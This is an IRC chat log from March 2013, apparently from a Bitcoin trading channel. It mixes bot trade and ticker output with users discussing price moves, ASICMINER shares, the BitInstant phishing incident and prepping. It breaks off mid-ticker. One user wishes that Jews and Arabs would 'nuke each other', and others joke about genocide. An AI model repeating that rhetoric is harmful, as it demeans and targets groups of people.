thing.. when they don;t publish what drugs are illegal and frequently jail people carrying over the counter pharmacy drugs perfectly legal int eh country of origin Mar 05 22:59:46 oh you had a headache and bought ibuprofen with you? tough shit, see you in 4 years Mar 05 23:00:18 no wonder they're the us' most stalwart ally. Mar 05 23:02:16 yes even if you are only stopping over on the plane en route to another country and never get out Mar 05 23:03:06 melatonin is the one that gets the press for leaving you in jail in dubai if you're travelling from Britain to australia and stop in dubia Mar 05 23:03:36 although if poppy seeds fall off your in-flight bagel onto your shirt you're jailed as well Mar 05 23:03:46 lol yeah Mar 05 23:04:10 and don't forget their magic machines that can detect undetectable amounts of cannabis under the dirt clung to your shoes Mar 05 23:04:43 allah admiral ackbar Mar 05 23:06:27 the only upside is that they have two law tiers, which is nice (the us does too) Mar 05 23:06:47 so you can go on a special "is not a mook" ticket and just do coke off model butt with the sheiks Mar 05 23:07:04 [HAVELOCK] [SDICE] 2 @ 0.548 = 1.096 BTC [+] Mar 05 23:07:16 forein women are allowed to read if they do it in private Mar 05 23:08:35 sooner the jews and arabs nuke each other into oblivion the better Mar 05 23:09:48 i was disappointed to learn that the 1500 russians injured when the meteorite exploded above their heads were mostly treated for cuts related to broken glass Mar 05 23:11:44 broken bones would be better? Mar 05 23:11:46 what did you expect ? Mar 05 23:11:50 pyroglass. Mar 05 23:11:55 that they got hit with space rocks Mar 05 23:11:58 not windows Mar 05 23:12:08 or bsd Mar 05 23:12:27 better if they started growing tentacles Mar 05 23:12:39 tentacles probably take weeks to grow Mar 05 23:12:39 Lyspooner si is one of the more common elements. when heated it makes glass. most meteorites that ain't metallic are obsydian basically. Mar 05 23:13:12 what's cooler, obsidian from a meteorite or obsidian from a volcano? Mar 05 23:13:44 a pound of feathers Mar 05 23:14:25 i am heavy metal Mar 05 23:14:36 and i stink like sulphur Mar 05 23:14:44 change the water Mar 05 23:15:02 [HAVELOCK] [SDICE] 5 @ 0.5489 = 2.7445 BTC [+] Mar 05 23:17:03 [HAVELOCK] [SDICE] 20 @ 0.53162 = 10.6324 BTC [-] Mar 05 23:17:18 ;;ticker Mar 05 23:17:19 BTCUSD ticker | Best bid: 40.01667, Best ask: 40.19000, Bid-ask spread: 0.17333, Last trade: 40.16999, 24 hour volume: 83584.00647079, 24 hour low: 36.00012, 24 hour high: 40.64625, 24 hour vwap: 39.14721 Mar 05 23:21:43 [MPEX] [S.DICE] 1900 @ 0.00500001 = 9.5 BTC [-] Mar 05 23:22:39 [BTCTC] [S.DICE-PT] 646 @ 0.00569 = 3.6757 BTC [+] Mar 05 23:27:55 [MPEX] [S.DICE] 100 @ 0.00500001 = 0.5 BTC [-] Mar 05 23:27:55 [MPEX] [S.DICE] 1900 @ 0.00500001 = 9.5 BTC [-] Mar 05 23:33:41 jurov: A new motion has been posted on ASICMINER-PT i see no motion? Mar 05 23:34:22 i have nothing wrt asicminer-pt Mar 05 23:35:09 well i stand corrected Mar 05 23:35:19 burnie is who i meant Mar 05 23:35:28 oops Mar 05 23:35:34 :) Mar 05 23:35:47 [BTCTC] [GSDPT] 15 @ 0.00608 = 0.0912 BTC [-] Mar 05 23:35:48 heh Mar 05 23:35:54 hit the motions tab Mar 05 23:36:04 i did big guy Mar 05 23:36:16 ZedsterX they're all mpoe-pr anyway. Mar 05 23:36:17 No motions yet Mar 05 23:36:23 hmmm Mar 05 23:36:41 gotta be a caching thing, one sec. Mar 05 23:36:42 i am aware of that mp :) Mar 05 23:37:15 i gotta run just thought ya should know Mar 05 23:37:15 0.00608? Common, S.DICE-PT is like 6.5% cheaper Mar 05 23:37:27 [BTCTC] [S.DICE-PT] 15 @ 0.00569 = 0.0854 BTC [+] Mar 05 23:38:03 [HAVELOCK] [SDICE] 1 @ 0.53162 BTC [-] Mar 05 23:38:50 Heya burnside. You gonna have some Startum h4wtness for us? Mar 05 23:38:53 thar she is, try it again now Mar 05 23:39:11 had a 600 second cache when it should have only been 60 Mar 05 23:39:12 Stratum too Mar 05 23:40:53 I really want to get stratum going, I'm testing it via our DDoS service. Mar 05 23:41:14 Gotta make sure it works through 'em Mar 05 23:42:13 [MPEX] [S.MPOE] 18055 @ 0.00074217 = 13.3999 BTC [-] Mar 05 23:42:53 [MPEX] [S.DICE] 100 @ 0.00500001 = 0.5 BTC [-] Mar 05 23:42:55 [MPEX] [S.DICE] 900 @ 0.00500001 = 4.5 BTC [-] Mar 05 23:48:39 hey all, the motion is up on ASICMINER-PT, grants 90 days no maintenance fees (in theory, should be long enough for Friedcat to get his exchange going) and also reduces the maintenance in tiers down to 0.5% if there are more than 10k shares being maintained. Mar 05 23:49:04 [HAVELOCK] [SDICE] 2 @ 0.525 = 1.05 BTC [-] Mar 05 23:49:12 anyone here want 100 asicminer? Mar 05 23:49:15 should cover all the bases, highly recommend approval, as there's no downside for shareholders. Mar 05 23:49:57 dub, how much? Mar 05 23:50:51 idk, what are the going for? Mar 05 23:51:02 looks like .65 on teh PTs Mar 05 23:51:13 .55 on forums, .65 on PTs i think Mar 05 23:51:29 why the disparity? Mar 05 23:51:40 they sell fast on forums Mar 05 23:51:43 and slow on PT Mar 05 23:52:30 ours are more expensive because I had to secure a call option to get it started. Mar 05 23:52:58 why the disparity? << because not beingon an exchange sucks. Mar 05 23:53:04 there are only 2 ppl selling on the PT's. INAU, and Burnside, right? Mar 05 23:54:47 but there's benefits there too. don't have to deal with trust issues, escrow, etc. Mar 05 23:55:15 yeah, liquidity will be much better on and exchange if you need to move fast Mar 05 23:55:33 but i could, say, Mar 05 23:55:36 yeah, I think right now it's INAU's shares on BF. I'm not certain of that. Mar 05 23:55:41 dub pass your shares into BF Mar 05 23:55:41 okay Mar 05 23:55:45 then push to me Mar 05 23:55:49 how much asicminer got mining hash rate? Mar 05 23:55:53 and escrow my coins Mar 05 23:56:10 i can sell 18 shares (asicminer) for 0.65 each Mar 05 23:56:16 pm me if interested., Mar 05 23:56:49 you and everyone else Mar 05 23:56:53 heh Mar 05 23:57:42 I'm hoping I can sell all 1000 in short order because it'll let me issue a small refund that'll bring the price down a bit. Mar 05 23:57:47 buttfunder? Mar 05 23:58:02 with the premium on the option the shares are more expensive in lower volume Mar 05 23:58:05 burnie like the motion but ya know nice guys never win Mar 05 23:58:35 haha, ZedsterX, I kinda like my utopian bubble. Mar 05 23:58:55 hehe Mar 05 23:58:56 burn, if you wanna sell 1000 shares Mar 05 23:58:59 put em at 55 Mar 05 23:59:03 [HAVELOCK] [SDICE] 5 @ 0.5489 = 2.7445 BTC [+] Mar 05 23:59:44 I hear ya, didn't get 'em at 55 tho. breakeven is around 64 if all 1000 sell Mar 06 00:00:20 sucks, I know, but that's the option I got. Mar 06 00:00:36 you could get rid of that complicated tier scheme Mar 06 00:00:53 and promo them as pnly 1% cit from divs, nor service fees Mar 06 00:00:55 in a week when asicminer is doing 12TH and they're 1 BTC/ea the 3 weeks remaining on the option are going to look pretty nice. Mar 06 00:02:02 they're doing 12th in a week ? Mar 06 00:02:18 now if i only have 4 shares I still fall the 10000 share catergory right? Mar 06 00:02:30 that was a prediction, I think I heard that they're doing 7.2TH today Mar 06 00:02:40 ZedsterX, definitely Mar 06 00:02:45 sweet Mar 06 00:02:50 it's how many are in the passthru total Mar 06 00:03:00 cool Mar 06 00:03:37 once again i was miss reading...geez its hard to be so slow sometimes Mar 06 00:04:09 http://www.finalsatoshi.com/ Mar 06 00:04:44 ThickAsThieves, I hear ya, but contracts are for when things go bad as much as they are for when things go good. **** BEGIN LOGGING AT Wed Mar 6 04:11:37 2013 Mar 06 04:12:03 ;;ticker Mar 06 04:12:05 BTCUSD ticker | Best bid: 41.56001, Best ask: 41.65000, Bid-ask spread: 0.08999, Last trade: 41.65000, 24 hour volume: 94505.95802205, 24 hour low: 36.15200, 24 hour high: 41.79000, 24 hour vwap: 39.61246 Mar 06 04:12:12 what, only 41 ?! Mar 06 04:12:15 i wish to speak to the manager. Mar 06 04:13:06 ;;later tell bugpowder BTCUSD ticker | Best bid: 41.56001 - the oix fuckin' predicted, man! Mar 06 04:13:06 The operation succeeded. Mar 06 04:13:09 [BTCTC] [ESECURITYSABTC] 20 @ 0.63494 = 12.6988 BTC [-] Mar 06 04:13:12 [MPEX] [S.DICE] 2504 @ 0.00485 = 12.1444 BTC [-] Mar 06 04:15:04 http://falkvinge.net/2013/03/06/the-target-value-for-bitcoin-is-not-some-50-or-100-it-is-100000-to-1000000/ Mar 06 04:15:18 100,000 here we come Mar 06 04:15:41 lol Mar 06 04:16:03 while that's true for later on, Mar 06 04:16:06 for now i'd be worried Mar 06 04:16:12 he says starting around 2019 Mar 06 04:16:21 like that i can see it Mar 06 04:16:28 like when it will start to go mainstream Mar 06 04:16:43 mircea_popescu should drop a sell bomb Mar 06 04:16:44 really, just 6 years? Mar 06 04:16:45 yeah that is kinda what i was thinking too, but 100,000 each is a bit high Mar 06 04:16:54 pop the bubble Mar 06 04:16:57 pop it Mar 06 04:17:06 https://twitter.com/CharlieShrem/status/309115529589829632 Mar 06 04:17:10 this is kinda worrisome. Mar 06 04:17:17 fbi got him? Mar 06 04:17:24 TomServo 6 years you know ? look what happened in 2. Mar 06 04:17:27 interwebs move fast. Mar 06 04:17:35 i still believe my old 1 month - 1 year thing. Mar 06 04:17:58 thestringpuller you didn't buy enough under 20 cause it was too expensive last month, did you. Mar 06 04:18:00 bitinstant still down and out with peoples money? Mar 06 04:18:06 I get 6 years would be an eternity for bitcoin, but that still seems...aggressive. Mar 06 04:18:16 im suprised that's his only reponse to the trilema blog Mar 06 04:18:23 Chaang-Noi they got fucked but it's not their fault and their #1 priority is security except not rly. Mar 06 04:18:29 Chaang-Noi: huh, did he just publish that? Mar 06 04:18:40 we've only been at $41.50 for like an hour Mar 06 04:18:43 mod6 it's easier. Mar 06 04:18:52 they seem extra scammy Mar 06 04:19:02 [HAVELOCK] [KCIM] 1 @ 0.99999999 BTC [+] Mar 06 04:19:13 i dunno, they don't seem scammy to me, but certainly veering into the "we're 18 hear us roar" sorta attitude. Mar 06 04:19:52 yeah, they're old than that though...and they ought to start caring about security Mar 06 04:20:11 before they have gaping anus' Mar 06 04:20:36 *older Mar 06 04:21:06 i think the perspective shift from "we're trying and so nobody should criticise us" to "w'ere doing" is really difficult for most kids Mar 06 04:21:12 and extra difficult for all americans. Mar 06 04:22:17 well, in my 13 years of software dev in this country, it has /always/ been: Dollars first, security when we can get to it. Mar 06 04:22:40 kinda hard to secure platforms that weren't build around security from the very beginning. Mar 06 04:22:45 absolutly /never/ do they build shit with any security model in mind. Mar 06 04:23:01 yea...welll... the trillions in yearly online fraud have to come from somewhere. Mar 06 04:23:06 mircea_popescu: no i just like seeing self inflicted crashes so rich people can profiteer Mar 06 04:23:07 its constantly bolted on the side. Mar 06 04:23:12 smickles has all my btc :( Mar 06 04:23:45 Confirmed total: 3,735 BTC Mar 06 04:24:11 dude i totally like this bitbet. wouldn't it be the laugh of all time if i end up retiring over my bitbet stock Mar 06 04:24:34 :] Mar 06 04:24:38 stupid people Mar 06 04:24:56 what bet? Mar 06 04:25:26 I try to give them my money but nooo, their property is a unique snowflake that is clearly worth more than people are willing to pay Mar 06 04:25:29 thestringpuller site total. Mar 06 04:25:38 dub stop buying girlfriends. Mar 06 04:25:59 in other news, bfl 210:50 against april 1st delivery. Mar 06 04:26:08 HEH Mar 06 04:26:10 ouch Mar 06 04:26:20 bitinstant was down, people could not get their money/btc maybe people know now but when i went to bed 8 hours ago i had no idea why Mar 06 04:26:29 mp how did they get fucked? Mar 06 04:26:32 Chaang-Noi basically the story is, Mar 06 04:26:38 apirl 1st bfl comes out saying it they were joking all along Mar 06 04:26:40 someone got their dns host through social engineering Mar 06 04:26:47 they saw the foreign email, removed it and went to bed Mar 06 04:26:51 then the next morning got phished Mar 06 04:26:55 then lost 1k btc off one of the exchanges Mar 06 04:27:03 mod6 :P Mar 06 04:27:04 oh lol Mar 06 04:27:04 then "the community should learn a lesson" Mar 06 04:27:21 they make no mention of what actual measures they took for the future, and don't seem to have learned anything at all. Mar 06 04:27:30 so i wrote a piece explaining why and wherefore Mar 06 04:27:39 which shrem just went on the record saying he doesn't comprehend. Mar 06 04:27:50 so i'm thinking... best stick to smpake and d&t's services. Mar 06 04:27:52 well i like veer and think bitinstant is needed for btc, but that charlie guy... lol Mar 06 04:28:14 i don't really know either two of them, tbh. never used the bitinstant thing Mar 06 04:28:29 erik and charlie are both very nice Mar 06 04:28:39 charlie has been very busy personally lately Mar 06 04:28:52 and erik has been out and about traveling Mar 06 04:28:56 that charlie guy honestly i think might be mildly retarded. he said he was scared to take money form the fbi in his thread and i was like why? are doing something illegal? he responce was the "fedral bra inspectors" i was like wtf?? Mar 06 04:29:35 Ukto http://trilema.com/2013/the-events-of-failday/ << it kinda explains what my issue is with the entire thing. Mar 06 04:30:02 atleast they only lost 1000 btc, could ahve been much much higher Mar 06 04:30:03 welcome to 42$ Mar 06 04:30:06 Chaang-Noi there was recently a rash of small arms manufacturers refusing to deal with their rogue government there Mar 06 04:30:10 maybe this is of the same sort. Mar 06 04:30:11 erik is clearly retarded, doesn't bode well if both of them are Mar 06 04:30:13 fbi doing something illegal? happens. prosocutors offering compromise to get you to do illegal acts on their behalf? happens. kimdotcom? happened. Mar 06 04:30:21 [BTCTC] [GSDPT] 1262 @ 0.00608 = 7.673 BTC [-] Mar 06 04:30:24 ;;ticker Mar 06 04:30:27 BTCUSD ticker | Best bid: 42.00000, Best ask: 42.05750, Bid-ask spread: 0.05750, Last trade: 42.00000, 24 hour volume: 97498.99357980, 24 hour low: 36.47000, 24 hour high: 42.50689, 24 hour vwap: 39.76206 Mar 06 04:30:32 mp where? Mar 06 04:30:34 error4733 that's more like it. are you the manager ? Mar 06 04:31:00 Ukto that is what i said, is using bitinstant an illegal act, and he would not answer me yes or no... Mar 06 04:31:23 Ukto he went on some childish tanget about bras to avoid the topic Mar 06 04:31:59 weak Mar 06 04:32:03 we are well into 42... i wake up and pop 41 and pop 42.. damn Mar 06 04:32:31 welcome to 42$ Mar 06 04:32:33 i told him i cant tell people to use bitinstant any more if he cant tell me that he does not think using it is not illegal... Mar 06 04:32:39 $42.68 is current high Mar 06 04:32:43 ;;ticker Mar 06 04:32:44 BTCUSD ticker | Best bid: 42.00000, Best ask: 42.47121, Bid-ask spread: 0.47121, Last trade: 42.47121, 24 hour volume: 97587.14426085, 24 hour low: 36.50000, 24 hour high: 42.68943, 24 hour vwap: 39.76494 Mar 06 04:33:12 if it was not for all the strong bids id say this is bubble:/ but it does not look like bubble:/ Mar 06 04:33:40 i think the sellers who were going to sell sold at 28-32 expecting to get them cheaper... Mar 06 04:33:51 Chaang-Noi Feb 23 17:44:29 http://www.theblaze.com/stories/2013/02/23/gaining-momentum-now-42-gun-companies-have-stopped-selling-to-law-enforcement-in-anti-2nd-amendment-states/ Mar 06 04:34:15 america and guns :) Mar 06 04:34:19 Sold 7% @ $40.40 Mar 06 04:34:26 3 hours ago Mar 06 04:34:27 hi guest Mar 06 04:34:29 LOL Mar 06 04:34:44 i sold about 5% at 35ish... Mar 06 04:35:00 ;;ticker Mar 06 04:35:02 BTCUSD ticker | Best bid: 42.05850, Best ask: 42.30000, Bid-ask spread: 0.24150, Last trade: 42.05850, 24 hour volume: 97857.41109838, 24 hour low: 36.56000, 24 hour high: 42.69000, 24 hour vwap: 39.77385 Mar 06 04:35:02 i've not sold Mar 06 04:35:11 sold 0% Mar 06 04:35:25 Selling a little makes me have courage Mar 06 04:35:28 selling is for girls Mar 06 04:35:29 for the long hold Mar 06 04:35:32 yes Mar 06 04:35:37 it actually is for girls Mar 06 04:35:41 selling a little makes my family have food and nice things... Mar 06 04:35:42 wife is happy Mar 06 04:35:44 so then great :D Mar 06 04:35:47 now let my coins be... Mar 06 04:35:51 haha Mar 06 04:36:04 Now S.DICE needs to bounce Mar 06 04:36:08 this is redic Mar 06 04:36:22 jcpham more than a house, less than a car ? Mar 06 04:36:31 I should deposit and buy that block at .0047 Mar 06 04:36:45 i traded afe wbitcoinf or 800$ in amazon the other day Mar 06 04:36:52 mp that is lol but just a stunt, the cops will get arms Mar 06 04:36:53 wth Mar 06 04:36:55 "Swarm Economy"... i originally read "Smarm Economy Mar 06 04:37:11 anyways Ilaunder my money through my family Mar 06 04:37:12 Chaang-Noi yeah, asciilifeform was making the same point, marketing gimmick. Mar 06 04:37:16 buy them the things they need Mar 06 04:37:32 gets in the press, make a point Mar 06 04:37:57 mircea_popescu i noticed that reference btw Mar 06 04:38:00 good one Mar 06 04:38:09 s.duece is never bouncing Mar 06 04:38:16 :p Mar 06 04:38:22 i only had about 300 BTC stolen from me Mar 06 04:38:28 1600btc if i count the interest Mar 06 04:38:29 Chaang-Noi cheebydi Chilca chippewa-adm COGSMITH coingenuity ColdHardMetal copumpkin Cory Mar 06 04:38:32 lol Mar 06 04:38:36 jcpham i'm the agent of "never forget" Mar 06 04:38:39 so no big deal Mar 06 04:38:46 [BTCTC] [S.DICE-PT] 1262 @ 0.00569 = 7.1808 BTC [+] Mar 06 04:39:00 1600 btc wouldn't have bought a car back in sept would it have ? Mar 06 04:39:07 but this time last year i mined a few hundred bucks a day Mar 06 04:39:15 and gave it to strangers for shits and giggles Mar 06 04:39:18 i guess just about yeah. Mar 06 04:39:19 my how we change Mar 06 04:39:42 jcpham i'm still in that phase, just, the rate supports my extravagance. Mar 06 04:39:43 $43 Mar 06 04:39:47 43$ Mar 06 04:39:47 no fucking way ?! Mar 06 04:39:49 ;;ticker Mar 06 04:39:49 BTCUSD ticker | Best bid: 42.99998, Best ask: 43.00000, Bid-ask spread: 0.00002, Last trade: 42.99998, 24 hour volume: 98119.15011464, 24 hour low: 36.69989, 24 hour high: 43.00000, 24 hour vwap: 39.80119 Mar 06 04:39:52 it might have bought me a yugo Mar 06 04:39:54 haha Mar 06 04:39:57 WTF Mar 06 04:40:04 ok mr manager, i withdraw my complaint. Mar 06 04:40:17 [MPEX] [S.MPOE] 13497 @ 0.00073462 = 9.9152 BTC [+] Mar 06 04:40:19 [MPEX] [S.MPOE] 34806 @ 0.00075 = 26.1045 BTC [+] Mar 06 04:40:20 [BTCTC] [GSDPT] 908 @ 0.00608 = 5.5206 BTC [-] Mar 06 04:40:23 50 is happening this week. Mar 06 04:40:27 i regret all the silver bullion i've bought Mar 06 04:40:34 facepalm Mar 06 04:40:42 jcpham i never bouight any! ha! Mar 06 04:40:48 good for you Mar 06 04:41:03 i regret not invented bitcoin Mar 06 04:41:04 i've brought in about 100 ounces Mar 06 04:41:17 that i payed way to much for at this juncture Mar 06 04:41:18 my problem was, so buy 100 ounces. da fuck do i do with it now ? Mar 06 04:41:32 more shit to stumble over. Mar 06 04:41:42 i think many people love bitcoin PRECISELY because it's so ethereal. Mar 06 04:42:37 so all these librariantarians hoard metal for the econopocalypse right? Mar 06 04:42:45 i really hope this price finds long term support Mar 06 04:42:57 because when everyone is starving they are goign to care about silver and gold Mar 06 04:43:08 [20:39] Mar06 02:40:52 mtgox 0.4000 @ 43.00 USD Mar 06 04:43:09 i have some metal on hand in case i need to trade one day Mar 06 04:43:23 speaking of physical investments with use value (unlike metals) ... Mar 06 04:43:26 protip: hoard food and ammo, nobody is goign to want your shiney metal Mar 06 04:43:27 god job prepper ! Mar 06 04:43:32 i like to think i have enough shiny stuff to purchase something i might need Mar 06 04:43:34 you know what has been doing almost as well as BTC? Ammo. Mar 06 04:43:39 but what i might need i do not know Mar 06 04:43:41 [MPEX] [O.BTCUSD.C370T] 24 @ 0.22 = 5.28 BTC [+] Mar 06 04:43:53 i also have several thousand rounds of ammo Mar 06 04:43:56 [MPEX] [O.BTCUSD.C350T] 10 @ 0.24103982 = 2.4104 BTC [+] Mar 06 04:43:56 just in case Mar 06 04:44:23 i also have plans to lock down my little island Mar 06 04:44:28 should shit hit the fan Mar 06 04:44:32 [MPEX] [O.BTCUSD.C390T] 5 @ 0.20618917 = 1.0309 BTC [+] Mar 06 04:44:33 [MPEX] [O.BTCUSD.C390T] 1000 @ 0.23521087 = 235.2109 BTC [+] Mar 06 04:44:35 i don't understand how metal is supposed to have value when fiat doesnt Mar 06 04:44:42 i fell you there Mar 06 04:44:51 the more i think about it the more i tend to agree Mar 06 04:44:52 ;;asks 43 Mar 06 04:44:59 my thoughts on metal have changed Mar 06 04:45:00 There are currently 112.41585 bitcoins offered at or under 43.0 USD, worth 4833.88037854 USD in total. | Data vintage: 0.0015 seconds Mar 06 04:45:15 [MPEX] [O.BTCUSD.C410T] 1000 @ 0.21048426 = 210.4843 BTC [+] Mar 06 04:45:16 that wont hold lol Mar 06 04:45:35 lol Mar 06 04:45:38 sure you can make ammo out of metal but its probably cheaper ot hoard lead? Mar 06 04:45:47 ;;asks 50 Mar 06 04:45:47 There are currently 14803.645 bitcoins offered at or under 50.0 USD, worth 693447.9213 USD in total. | Data vintage: 46.9849 seconds Mar 06 04:45:52 i really hope this price finds long term support << it just might. the reason is that bitcoin with large marketcap is more useful than bitcoin with low mkt cap. Mar 06 04:46:06 asciilifeform ammo is almost pure metal :D Mar 06 04:46:12 AU/AG have value if the collapse is less-than-global, and there are speculators who might trade you food/etc from abroad in exchange for some shiny metal. Mar 06 04:46:15 ;;goxlag Mar 06 04:46:15 78.10124 seconds Mar 06 04:46:18 ouch Mar 06 04:46:29 There are currently 112.41585 bitcoins offered at or under 43.0 USD, << epic. Mar 06 04:46:41 asciilifeform: you gonna sail to another country to trade with them? Mar 06 04:46:50 asciilifeform: do you know how to make a sailboat? Mar 06 04:47:04 no, they do the traveling. See "shuttles" in the collapsing USSR period. Mar 06 04:47:13 [MPEX] [O.BTCUSD.C430T] 1000 @ 0.18844965 = 188.4497 BTC [+] Mar 06 04:47:23 ok, the quantity of options i've sold is staggering. Mar 06 04:47:42 when a nation collapses, people from nearby (and not so nearby) places come to vacuum up the valuables. Mar 06 04:47:52 when a nation collapses, people from nearby (and not so nearby) places come to vacuum up the valuables. << word on that. Mar 06 04:48:00 sometimes via trade in basic necessities, sometimes with brute force Mar 06 04:48:03 on the collapse of bulgaria in the 90s i went there with a truck full of cans Mar 06 04:48:03 mircea_popescu a lot of these numbers and amths are going to be staggering from now on Mar 06 04:48:09 came back with truck full of joolry and shit. Mar 06 04:48:21 jcpham i guess you're right. Mar 06 04:48:38 if this 50 ish range finds support Mar 06 04:48:42 mircea_popescu: what? were they hoarding the jools in their ass? Mar 06 04:48:47 the math gets crazier Mar 06 04:48:52 lol Mar 06 04:49:02 dub they had it real bad at one point. so bad in fact Mar 06 04:49:07 some1 can sell 20K Sdice ? Mar 06 04:49:07 the accepted bus fare was 1 egg Mar 06 04:49:10 in like, sofia. Mar 06 04:49:19 just for crush the market to 0.003 Mar 06 04:49:28 an egg as currency makes sense if perople are hungry though Mar 06 04:49:41 if i was starving i'd gladly accept an egg Mar 06 04:49:44 yeah, provided it doesn't stay currency for too long. Mar 06 04:49:49 hahha Mar 06 04:50:01 a three week old egg in the summer is more of a weapon than a food item Mar 06 04:50:15 yeah idefinitely infuse rotten egs in the supply Mar 06 04:50:24 then call yourself bernanke. Mar 06 04:50:29 unless you're in china Mar 06 04:50:29 the big sale on S.DICE just got pulled Mar 06 04:50:34 and also have a horse Mar 06 04:50:35 buy ketchup Mar 06 04:50:41 that what bernanke tells me Mar 06 04:50:52 jcpham: amm and 'turkey Mar 06 04:51:00 ammo* Mar 06 04:51:00 or is that warren buffet Mar 06 04:51:18 [MPEX] [S.MPOE] 100000 @ 0.00075 = 75 BTC [+] Mar 06 04:52:30 [MPEX] [O.BTCUSD.C410T] 10 @ 0.21068324 = 2.1068 BTC [+] Mar 06 04:52:51 of course speculators in necessities might as well have bull's eyes painted on them (both for idiot idealists and for marauders) Mar 06 04:53:13 [MPEX] [O.BTCUSD.C430T] 1000 @ 0.18863313 = 188.6331 BTC [+] Mar 06 04:53:25 [MPEX] [O.BTCUSD.C390T] 1000 @ 0.23542766 = 235.4277 BTC [+] Mar 06 04:53:26 [MPEX] [O.BTCUSD.C410T] 990 @ 0.21068324 = 208.5764 BTC [+] Mar 06 04:53:42 [MPEX] [O.BTCUSD.C370T] 10 @ 0.23622767 = 2.3623 BTC [+] Mar 06 04:53:46 o boy. Mar 06 04:53:49 this is one of those. Mar 06 04:53:51 mircea_popescu: how was your Bulgarian bus defended? Mar 06 04:54:02 asciilifeform i am not at liberty to discuss. Mar 06 04:54:08 didn't think so Mar 06 04:54:36 but for the record, there wasn't much violence at the time. Mar 06 04:54:48 certainly less than what counts as a "quiet day" in washington dc or la. Mar 06 04:55:10 for that matter, the collapse of the serbian govt during the allied bombing didn't engender much violence at all. Mar 06 04:55:31 direct experience shows that without a government people are pretty much doing the exact same things. Mar 06 04:55:37 just some casual genocide Mar 06 04:55:50 mircea_popescu: the Serbs took care of their diversity problem prior to the bombing. In fact, that was the official excuse for the latter... Mar 06 04:56:00 myeah. Mar 06 04:56:11 'murica: ruining your culture with economics and technology since 1944 Mar 06 04:56:53 mostly i blame the japanese and perl harbor for the sad state of world affairs Mar 06 04:57:01 why bnot go the extra mile and Mar 06 04:57:03 blame godzilla. Mar 06 04:57:04 *pearl Mar 06 04:57:15 ahahaha PERL HARBOR! totally. Mar 06 04:57:19 i've never seen godzilla irl so... Mar 06 04:57:21 fuck it. perl ruined the world. Mar 06 04:57:36 we can't has good twang because perl. Mar 06 04:57:37 lol Mar 06 04:57:45 let's go the whole hog and blame... Cromwell. Mar 06 04:57:51 $43.50 Mar 06 04:58:00 asciilifeform i have a piece about how lincoln is the original cause america sucks. Mar 06 04:58:11 why cromwell ? Mar 06 04:58:20 British colonialism is really to blame Mar 06 04:58:29 or the romans if we want to really point fingers Mar 06 04:58:38 colonialism is the solution, not the problem. Mar 06 04:58:47 english misunderstanding of french socialism is the problem. Mar 06 05:00:04 Cromwell pulled the first modern idiot revolution. Mar 06 05:00:24 why not alaric, king of the goths ? Mar 06 05:00:41 why not the kingdom of bulgaria, to come full circle. Mar 06 05:00:45 that was efore my time Mar 06 05:01:00 i've only been around for a few hundred years Mar 06 05:01:19 Alaric didn't specifically target the concept of nobility. Mar 06 05:01:26 orly ?! Mar 06 05:01:37 beer. Mar 06 05:02:47 44 Mar 06 05:02:54 o no fucking way Mar 06 05:03:17 [BTCTC] [ASICMINER-PT] 20 @ 0.65 = 13 BTC [-] Mar 06 05:03:43 twitter sez "discosync.co just won $25k on stage at @Launch." Mar 06 05:03:52 i'm like.. chuckle. 25k ? 25k whats ? Mar 06 05:03:54 bitcoins ? Mar 06 05:04:36 [MPEX] [O.BTCUSD.C390T] 1000 @ 0.23679642 = 236.7964 BTC [+] Mar 06 05:04:45 [MPEX] [O.BTCUSD.C430T] 1000 @ 0.18982587 = 189.8259 BTC [+] Mar 06 05:04:47 [MPEX] [O.BTCUSD.C410T] 1000 @ 0.21195868 = 211.9587 BTC [+] Mar 06 05:05:41 ;;ticker Mar 06 05:05:41 BTCUSD ticker | Best bid: 43.90000, Best ask: 44.00000, Bid-ask spread: 0.10000, Last trade: 44.00000, 24 hour volume: 100112.20743136, 24 hour low: 36.71000, 24 hour high: 44.00000, 24 hour vwap: 39.94269 Mar 06 05:05:47 "and though may never have to, it's good to have options" Mar 06 05:05:51 i Mar 06 05:08:39 !ticker m "^OIX" Mar 06 05:08:40 These beans is shit. Mar 06 05:08:45 lol Mar 06 05:08:50 !ticker m ^OIX Mar 06 05:08:51 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 29.08490939 / 43.71874246 / 47.83958615 (no shares, 8,160.59 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 06 05:09:03 hm can that be right ?! Mar 06 05:09:04 !ticker m ^OIX Mar 06 05:09:06 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 29.08490939 / 43.71874246 / 47.83958615 (no shares, 8,160.59 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 06 05:09:07 thx! Mar 06 05:09:59 I guess it could be right, have to do the calculation, but someone bought a bunch of puts @ 75 Mar 06 05:10:27 14`375 actually Mar 06 05:10:34 A LOT ! Mar 06 05:10:38 i think those were short Mar 06 05:10:45 ah Mar 06 05:11:24 [MPEX] [O.BTCUSD.C430T] 1000 @ 0.19079917 = 190.7992 BTC [+] Mar 06 05:11:34 [MPEX] [O.BTCUSD.C390T] 1000 @ 0.23791328 = 237.9133 BTC [+] Mar 06 05:11:35 [MPEX] [O.BTCUSD.C410T] 1000 @ 0.21299953 = 212.9995 BTC [+] Mar 06 05:12:33 45 Mar 06 05:12:56 Mar06 03:10:42 mtgox x88 1,000.0000 @ 44.93371459 USD Mar 06 05:13:07 the bloody fuck Mar 06 05:13:10 [MPEX] [O.BTCUSD.C450T] 10 @ 0.17096796 = 1.7097 BTC [+] Mar 06 05:13:16 where did 43 and 44 go? Mar 06 05:13:23 10 min each Mar 06 05:13:52 jesus, i go take a shit and they are gone... Mar 06 05:13:56 43's are gone, and the even's wern't created this month Mar 06 05:14:02 this is sorta like mining Mar 06 05:14:50 wow the last few ticks... totally ponzi looking Mar 06 05:15:31 lots of buy and holders Mar 06 05:16:05 ;;asks 50 Mar 06 05:16:12 amphipod> Mar06 03:03:55 mtgox x138 1,395.9533 @ 43.97145535 USD Mar 06 05:16:13 There are currently 11448.341 bitcoins offered at or under 50.0 USD, worth 548166.438908 USD in total. | Data vintage: 0.0021 seconds Mar 06 05:16:39 people are buying 1000 plus coins at a time at this price... Mar 06 05:16:41 wtf? Mar 06 05:16:42 data vintage eh ? Mar 06 05:16:53 lag Mar 06 05:17:03 ;;goxlag Mar 06 05:17:05 456.476647 seconds Mar 06 05:17:06 pretty cool way of sayin' it. Mar 06 05:17:07 ;;ticker Mar 06 05:17:08 BTCUSD ticker | Best bid: 44.06075, Best ask: 